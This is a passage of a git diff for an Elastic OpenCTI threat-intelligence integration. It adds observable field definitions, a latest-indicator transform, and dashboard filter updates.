name: key_usage + type: keyword + description: A multi-valued extension consisting of a list of names of the permitted key usages. + - name: extended_key_usage + type: keyword + description: A list of usages indicating purposes for which the certificate public key can be used for. + - name: subject_key_identifier + type: keyword + description: The identifier that provides a means of identifying certificates that contain a particular public key. + - name: authority_key_identifier + type: keyword + description: The identifier that provides a means of identifying the public key corresponding to the private key used to sign a certificate. + - name: subject_alternative_name + type: keyword + description: The additional identities to be bound to the subject of the certificate. + - name: issuer_alternative_name + type: keyword + description: The additional identities to be bound to the issuer of the certificate. + - name: subject_directory_attributes + type: keyword + description: The identification attributes (e.g., nationality) of the subject. + - name: crl_distribution_points + type: keyword + description: How CRL information is obtained. + - name: inhibit_any_policy + type: keyword + description: The number of additional certificates that may appear in the path before anyPolicy is no longer permitted. + - name: private_key_usage_period_not_before + type: date + description: The date on which the validity period begins for the private key, if it is different from the validity period of the certificate. + - name: private_key_usage_period_not_after + type: date + description: The date on which the validity period ends for the private key, if it is different from the validity period of the certificate. + - name: certificate_policies + type: keyword + description: A sequence of one or more policy information terms, each of which consists of an object identifier (OID) and optional qualifiers. + - name: policy_mappings + type: keyword + description: One or more pairs of OIDs; each pair includes an issuerDomainPolicy and a subjectDomainPolicy. + - name: ipv4_addr + type: group + description: Fields describing an IPv4 address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The values of one or more IPv4 addresses expressed using CIDR notation. + - name: ipv6_addr + type: group + description: Fields describing an IPv6 address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The values of one or more IPv6 addresses expressed using CIDR notation. + - name: mac_addr + type: group + description: Fields describing a mac address observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of a single MAC address. + - name: mutex + type: group + description: Fields describing a mutex observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: name + type: keyword + description: The name of the mutex object. + - name: network_traffic + type: group + description: Fields describing a network traffic observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: start + type: date + description: The date/time the network traffic was initiated, if known. + - name: end + type: date + description: The date/time the network traffic ended, if known. + - name: is_active + type: boolean + description: Indicates whether the network traffic is still ongoing. + - name: src_port + type: long + description: The source port used in the network traffic, as an integer. + - name: dst_port + type: long + description: The destination port used in the network traffic, as an integer. + - name: protocols + type: keyword + description: The protocols observed in the network traffic, along with their corresponding state. + - name: src_byte_count + type: long + description: The number of bytes, as a positive integer, sent from the source to the destination. + - name: dst_byte_count + type: long + description: The number of bytes, as a positive integer, sent from the destination to the source. + - name: src_packets + type: long + description: The number of packets, as a positive integer, sent from the source to the destination. + - name: dst_packets + type: long + description: The number of packets, as a positive integer, sent from the destination to the source. + - name: process + type: group + description: Fields describing a process observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: is_hidden + type: boolean + description: Whether the process is hidden. + - name: pid + type: long + description: The Process ID, or PID, of the process. + - name: created_time + type: date + description: The date/time at which the process was created. + - name: cwd + type: keyword + description: The current working directory of the process. + - name: description + type: keyword + description: Description of the process. + - name: command_line + type: keyword + description: The full command line used in executing the process, including the process name and any arguments. + - name: environment_variables + type: keyword + description: The list of environment variables associated with the process. + - name: aslr_enabled + type: boolean + description: Whether Address Space Layout Randomization (ASLR) is enabled for the process (on Windows). + - name: dep_enabled + type: boolean + description: Whether Data Execution Prevention (DEP) is enabled for the process (on Windows). + - name: priority + type: keyword + description: The current priority class of the process in Windows. + - name: owner_sid + type: keyword + description: The Security ID (SID) value of the owner of the process (on Windows). + - name: window_title + type: keyword + description: The title of the main window of the process (on Windows). + - name: startup_info + type: flattened + description: The STARTUP_INFO struct used by the process (on Windows). + - name: integrity_level + type: keyword + description: The Windows integrity level, or trustworthiness, of the process. + - name: service_name + type: keyword + description: The name of the (Windows) service. + - name: descriptions + type: keyword + description: The descriptions defined for the (Windows) service. + - name: display_name + type: keyword + description: The display name of the service in Windows GUI controls. + - name: group_name + type: keyword + description: The name of the load ordering group of which the (Windows) service is a member. + - name: start_type + type: keyword + description: The start options defined for the (Windows) service. + - name: service_type + type: keyword + description: The DLLs loaded by the (Windows) service, as a reference to one or more File objects. + - name: service_status + type: keyword + description: The type of the (Windows) service. + - name: service_dll + type: group + description: Fields describing a service DLL. + fields: + - name: hash + type: group + description: Hashes for the service DLL file. + fields: + - name: md5 + type: keyword + description: MD5 hash for the service DLL file. + - name: sha1 + type: keyword + description: SHA1 hash for the service DLL file. + - name: sha256 + type: keyword + description: SHA-256 hash for the service DLL file. + - name: sha512 + type: keyword + description: SHA-512 hash for the service DLL file. + - name: ssdeep + type: keyword + description: SSDEEP hash for the service DLL file. + - name: tlsh + type: keyword + description: TLSH hash for the service DLL file. + - name: sha3_256 + type: keyword + description: SHA3-256 hash for the service DLL file. + - name: sha3_512 + type: keyword + description: SHA3-512 hash for the service DLL file. + - name: size + type: long + description: The size of the service DLL file, in bytes. + - name: name + type: keyword + description: The name of the service DLL file. + - name: name_enc + type: keyword + description: The observed encoding for the name of the service DLL file, using the IANA character set registry. + - name: magic_number_hex + type: keyword + description: The hexadecimal constant ("magic number") associated with a specific file format that corresponds to the service DLL file, if applicable. + - name: mime_type + type: keyword + description: MIME type of the service DLL file, given as of the values defined in the Template column in the IANA media type registry, when feasible. + - name: ctime + type: date + description: The date/time the service DLL file was created. + - name: mtime + type: date + description: The date/time the service DLL file was last written to/modified. + - name: atime + type: date + description: The date/time the service DLL file was last accessed. + - name: additional_names + type: keyword + description: Additional names of the service DLL file. + - name: content + type: group + description: Fields describing service DLL file content. + fields: + - name: payload_bin + type: keyword + description: The binary data contained in the service DLL file as a base64-encoded string. + - name: url + type: keyword + description: A valid URL that resolves to the unencoded content of the service DLL file. + - name: encryption_algorithm + type: keyword + description: The type of encryption algorithm the binary data is encoded in, if the service DLL file is encrypted. + - name: decryption_key + type: keyword + description: The decryption key for the encrypted binary data of the service DLL file. + - name: software + type: group + description: Fields describing a software observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: name + type: keyword + description: The name of the software. + - name: cpe + type: keyword + description: The Common Platform Enumeration (CPE) entry for the software, if available. + - name: swid + type: keyword + description: The Software Identification (SWID) Tags entry for the software, if available. + - name: languages + type: keyword + description: The languages supported by the software, using RFC5646. + - name: vendor + type: keyword + description: The name of the vendor of the software. + - name: version + type: keyword + description: The version of the software. + - name: url + type: group + description: Fields describing a URL observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The value of the URL, using RFC3986. + - name: user_account + type: group + description: Fields describing a user account observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: user_id + type: keyword + description: The identifier of the account and may be a numeric ID, a GUID, an account name, an email address, etc. + - name: credential + type: keyword + description: A cleartext credential, not PII. + - name: account_login + type: keyword + description: The account login string, where it differs from the user_id. + - name: account_type + type: keyword + description: The type of the account. + - name: display_name + type: keyword + description: The display name of the account, to be shown in user interfaces, if applicable. + - name: is_service_account + type: boolean + description: Indicates that the account is associated with a network service or system process (daemon), not a specific individual. + - name: is_privileged + type: boolean + description: That the account has elevated privileges. + - name: can_escalate_privs + type: boolean + description: That the account has the ability to escalate privileges. + - name: is_disabled + type: boolean + description: If the account is disabled. + - name: account_created + type: date + description: When the account was created. + - name: account_expires + type: date + description: The expiration date of the account. + - name: credential_last_changed + type: date + description: When the account credential was last changed. + - name: account_first_login + type: date + description: When the account was first accessed. + - name: account_last_login + type: date + description: When the account was last accessed. + - name: windows_registry_key + type: group + description: Fields describing a Windows registry key observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: attribute_key + type: keyword + description: The full registry key including the hive. + - name: modified_time + type: date + description: The last date/time that the registry key was modified. + - name: number_of_subkeys + type: long + description: The number of subkeys contained under the registry key. + - name: windows_registry_value_type + type: group + description: Fields describing a Windows registry value type observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: name + type: keyword + description: The name of the registry value. + - name: data + type: keyword + description: The data contained in the registry value. + - name: data_type + type: keyword + description: The registry (REG_*) data type used in the registry value. + - name: cryptographic_key + type: group + description: Fields describing a cryptographic key observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: A cryptographic key. + - name: cryptocurrency_wallet + type: group + description: Fields describing a cryptocurrency wallet observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: A cryptocurrency wallet ID. + - name: hostname + type: group + description: Fields describing a hostname observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: A hostname. + - name: text + type: group + description: Fields describing a text observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: Text. + - name: user_agent + type: group + description: Fields describing a user agent observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: An HTTP User-Agent string. + - name: bank_account + type: group + description: Fields describing a bank account observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: iban + type: keyword + description: An International Bank Account Number (IBAN). + - name: bic + type: keyword + description: A Bank Identifier Code (BIC). + - name: account_number + type: keyword + description: A bank account number. + - name: phone_number + type: group + description: Fields describing a phone number observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: A phone number. + - name: payment_card + type: group + description: Fields describing a payment card observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: card_number + type: keyword + description: A payment card number. + - name: expiration_date + type: date + description: A payment card expiration date. + - name: cvv + type: keyword + description: A Card Verification Value (CVV) for a payment card. + - name: holder_name + type: long + description: The name of a payment card holder. + - name: media_content + type: group + description: Fields describing a media content observable. + fields: + - name: id + type: keyword + description: The ID of the observable in OpenCTI. + - name: standard_id + type: keyword + description: A predictable STIX ID, generated based on one or multiple attributes of the observable. + - name: entity_type + type: keyword + description: The observable type. + - name: value + type: keyword + description: The main value for the observable. + - name: title + type: keyword + description: The title of an item of media content. + - name: content + type: keyword + description: The content of an item of media content. + - name: media_category + type: keyword + description: The category of an item of media content. + - name: url + type: keyword + description: The URL of an item of media content. + - name: publication_date + type: date + description: The publication date of an item of media content. diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/manifest.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/manifest.yml new file mode 100644 index 00000000000..f5296fd0c0a --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +start: true +destination_index_template: + settings: + index: + sort: + field: + - "@timestamp" + order: + - desc + mappings: + dynamic: true + dynamic_templates: + - strings_as_keyword: + match_mapping_type: string + mapping: + ignore_above: 1024 + type: keyword + date_detection: false diff --git a/packages/ti_opencti/elasticsearch/transform/latest_ioc/transform.yml b/packages/ti_opencti/elasticsearch/transform/latest_ioc/transform.yml new file mode 100644 index 00000000000..6ba5cee4db5 --- /dev/null +++ b/packages/ti_opencti/elasticsearch/transform/latest_ioc/transform.yml @@ -0,0 +1,37 @@ +# Use of "*" to use all namespaces defined. +source: + index: + - "logs-ti_opencti.indicator-*" +# The version suffix on the dest.index should be incremented if a breaking +# change is made to the index mapping. You must also bump the +# fleet_transform_version for any change to this transform configuration to +# take effect. The old destination index is not automatically removed. We are +# dependent on https://github.com/elastic/package-spec/issues/523 to give us +# that ability in order to prevent having duplicate IoC data and prevent query +# time field type conflicts. +dest: + index: "logs-ti_opencti_latest.dest_indicator-1" + aliases: + - alias: "logs-ti_opencti_latest.indicator" + move_on_creation: true +latest: + unique_key: + - event.id + sort: "event.ingested" +description: Latest OpenCTI IoC data +frequency: 30s +sync: + time: + field: "event.ingested" + # Updated to 120s because of refresh delay in Serverless. With default 60s, + # sometimes transform wouldn't process all documents. + delay: 120s +retention_policy: + time: + field: opencti.indicator.invalid_or_revoked_from + max_age: 1m +_meta: + managed: true + # Bump this version to delete, reinstall, and restart the transform during + # package installation. + fleet_transform_version: 0.1.0 diff --git a/packages/ti_opencti/img/screenshot1.png b/packages/ti_opencti/img/screenshot1.png index ccd76578c2d..e99cd293a6a 100644 Binary files a/packages/ti_opencti/img/screenshot1.png and b/packages/ti_opencti/img/screenshot1.png differ diff --git a/packages/ti_opencti/img/screenshot2.png b/packages/ti_opencti/img/screenshot2.png index 545d85fbdef..d09f4022123 100644 Binary files a/packages/ti_opencti/img/screenshot2.png and b/packages/ti_opencti/img/screenshot2.png differ diff --git a/packages/ti_opencti/img/screenshot3.png b/packages/ti_opencti/img/screenshot3.png index e325ac4f834..234eed4f48b 100644 Binary files a/packages/ti_opencti/img/screenshot3.png and b/packages/ti_opencti/img/screenshot3.png differ diff --git a/packages/ti_opencti/img/screenshot4.png b/packages/ti_opencti/img/screenshot4.png new file mode 100644 index 00000000000..e325ac4f834 Binary files /dev/null and b/packages/ti_opencti/img/screenshot4.png differ diff --git a/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json b/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json index aee03e1c3ac..e08c4479e16 100644 --- a/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json +++ b/packages/ti_opencti/kibana/dashboard/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd.json @@ -42,7 +42,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "### Navigation\n\n[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd) \n**[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd)**\n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Tags \u0026 Quality\n\nThis dashboard allows the exploration of tags and quality metrics for indicators ingested by the OpenCTI integration.", + "markdown": "### Navigation\n\n[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd) \n**[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd)** \n[OpenCTI Ingestion](/app/dashboards#/view/ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624) \n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Tags \u0026 Quality\n\nThis dashboard allows the exploration of tags and quality metrics for current indicators ingested by the OpenCTI integration.", "openLinksInNewTab": false }, "title": "", @@ -58,12 +58,12 @@ "y": 0 }, "panelIndex": "9457bd9b-5ac6-4ca1-a220-b88f783d1587", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -72,7 +72,12 @@ }, { "id": "logs-*", - "name": "96ae6ce7-f243-42d6-8bb9-de60277b6175", + "name": "611380a6-8061-42ce-af79-e93f22ee5f64", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4bb48f19-a815-45c3-b9fd-69d30f2c1b8f", "type": "index-pattern" } ], @@ -97,7 +102,8 @@ "exclude": [ "forwarded", "opencti-indicator", - "ecs-indicator-detail" + "ecs-indicator-detail", + "preserve_original_event" ], "excludeIsRegex": false, "include": [], @@ -140,6 +146,50 @@ } }, "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "611380a6-8061-42ce-af79-e93f22ee5f64", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "4bb48f19-a815-45c3-b9fd-69d30f2c1b8f", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + }, { "$state": { "store": "appState" @@ -199,28 +249,24 @@ }, "panelIndex": "0f1a93c7-ce49-479c-a71d-42b60469bc11", "title": "Top 100 tags", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "3c59cfa0-0292-4164-8e1e-5e295c03878a", - "type": "index-pattern" } ], "state": { "adHocDataViews": {}, "datasourceStates": { "formBased": { + "currentIndexPatternId": "logs-*", "layers": { "71b1d087-bce6-4500-b278-55cc0b095db1": { "columnOrder": [ @@ -238,7 +284,8 @@ "exclude": [ "forwarded", "opencti-indicator", - "ecs-indicator-detail" + "ecs-indicator-detail", + "preserve_original_event" ], "excludeIsRegex": false, "include": [], @@ -287,6 +334,7 @@ } }, "incompleteColumns": {}, + "indexPatternId": "logs-*", "sampling": 1 } } @@ -304,7 +352,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "3c59cfa0-0292-4164-8e1e-5e295c03878a", + "index": "44890337-8f98-41af-bf85-eb3f2d51bb5d", "key": "event.dataset", "negate": false, "params": { @@ -317,6 +365,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "c601a528-0cf7-4772-b3bd-e6b539ea252c", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "3cdb4e06-c27c-4ab5-a1a7-ef328a7a2476", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -364,12 +456,12 @@ }, "panelIndex": "f789b019-a02c-47f1-bfe2-e3ff61d324c2", "title": "Tags", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -378,7 +470,17 @@ }, { "id": "logs-*", - "name": "30a35e84-12db-4d04-96a7-730e2be6292f", + "name": "529afafd-9447-4a7e-80ca-3cb28918e388", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "290b43ec-97e5-46eb-b7f4-6420595f01d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6632bf4b-421e-4098-a930-3cddfb30715c", "type": "index-pattern" } ], @@ -448,7 +550,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "30a35e84-12db-4d04-96a7-730e2be6292f", + "index": "529afafd-9447-4a7e-80ca-3cb28918e388", "key": "event.dataset", "negate": false, "params": { @@ -461,6 +563,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "290b43ec-97e5-46eb-b7f4-6420595f01d7", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "6632bf4b-421e-4098-a930-3cddfb30715c", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -510,12 +656,12 @@ }, "panelIndex": "7220547f-a0d6-463a-ab79-55ae71d6b36d", "title": "Indicators by confidence", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -524,7 +670,17 @@ }, { "id": "logs-*", - "name": "09aab673-4ab7-45ff-a1be-6effcc17a45a", + "name": "477c8a76-447e-42d1-a4db-648ad810bfda", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae5d2a8e-2cb5-4998-87fd-f2d81a3795d1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "77d39d04-7bf8-45ba-97b4-829ff0f2a6b1", "type": "index-pattern" } ], @@ -595,7 +751,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "09aab673-4ab7-45ff-a1be-6effcc17a45a", + "index": "477c8a76-447e-42d1-a4db-648ad810bfda", "key": "event.dataset", "negate": false, "params": { @@ -608,6 +764,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "ae5d2a8e-2cb5-4998-87fd-f2d81a3795d1", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "77d39d04-7bf8-45ba-97b4-829ff0f2a6b1", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -657,12 +857,12 @@ }, "panelIndex": "7b259062-abe4-4e8c-83d4-41464e369378", "title": "Indicators by score", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -671,7 +871,17 @@ }, { "id": "logs-*", - "name": "4899e00d-792d-4c6c-9f4d-cf59dea58b1f", + "name": "a8369e4f-1281-4f9a-b443-3632c41c043f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "925ad221-2903-40e2-b5ab-052b68e6e9bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "32003949-df5d-4324-80c3-545f27ce763e", "type": "index-pattern" } ], @@ -742,7 +952,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "4899e00d-792d-4c6c-9f4d-cf59dea58b1f", + "index": "a8369e4f-1281-4f9a-b443-3632c41c043f", "key": "event.dataset", "negate": false, "params": { @@ -755,6 +965,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "925ad221-2903-40e2-b5ab-052b68e6e9bc", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "32003949-df5d-4324-80c3-545f27ce763e", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -804,8 +1058,7 @@ }, "panelIndex": "aacaa31c-1405-4b13-98cb-ec814db7915d", "title": "Indicators by TLP marking", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -819,7 +1072,17 @@ }, { "id": "logs-*", - "name": "f8807b7b-8ae7-4a97-bc7a-68651001577f", + "name": "35c49c70-647e-460b-9e06-33d6fa8ea069", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "678016dd-e965-4881-b864-e63ddbdf3a8c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8db319a5-f8a5-4387-a461-d3193840b201", "type": "index-pattern" } ], @@ -889,7 +1152,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "f8807b7b-8ae7-4a97-bc7a-68651001577f", + "index": "35c49c70-647e-460b-9e06-33d6fa8ea069", "key": "event.dataset", "negate": false, "params": { @@ -902,6 +1165,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "678016dd-e965-4881-b864-e63ddbdf3a8c", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "8db319a5-f8a5-4387-a461-d3193840b201", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -946,12 +1253,12 @@ }, "panelIndex": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870", "title": "Indicators by provider", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -960,7 +1267,17 @@ }, { "id": "logs-*", - "name": "43144698-c2fc-4373-a3b2-da7a2e126200", + "name": "48725819-5f5e-42ba-af75-b2330782dd81", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09df8ebb-1c5b-4e74-84bc-b2e8552f9b59", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "890a47f4-ce5f-4ba9-af99-b2ac92d68c24", "type": "index-pattern" } ], @@ -1031,7 +1348,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "43144698-c2fc-4373-a3b2-da7a2e126200", + "index": "48725819-5f5e-42ba-af75-b2330782dd81", "key": "event.dataset", "negate": false, "params": { @@ -1044,6 +1361,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "09df8ebb-1c5b-4e74-84bc-b2e8552f9b59", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "890a47f4-ce5f-4ba9-af99-b2ac92d68c24", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1087,20 +1448,17 @@ }, 